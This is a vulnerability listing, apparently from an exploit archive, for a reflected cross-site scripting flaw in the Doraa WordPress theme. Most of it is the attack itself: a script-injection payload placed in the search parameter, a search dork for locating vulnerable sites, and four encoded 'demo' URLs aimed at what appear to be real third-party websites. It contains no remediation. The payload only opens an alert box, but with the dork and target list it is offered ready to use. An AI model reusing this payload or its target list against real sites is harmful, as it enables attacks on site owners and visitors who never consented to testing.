Wordpress theme Doraa XSS Vulnerability

2015.08.25
Credit: R3NW4
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: [Wordpress theme Doraa XSS Vulnerability] # Google Dork: [Themes by Bons.us] # Date: [24-8-2015] # Exploit Author: [R3NW4] # Platform: (WebApps) # Versions: [ 1.0 and lower ] # Greetz: XSSposed.org - All Kurdish Hackers ----------------------- Exploit: site.com/?s='"><script>alert(%2FXSSPOSED%2F)<%2Fscript> ------------------------- DemoZ: http://hotcarsreviXXews.info/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E http://carspricereXviews.com/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E http://20164runXner.com/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E http://www.interiorandfXurniture.com/?s=%27%22%3E%3Cscript%3Ealert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E ------------------------ # https://twitter.com/R3NW4


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top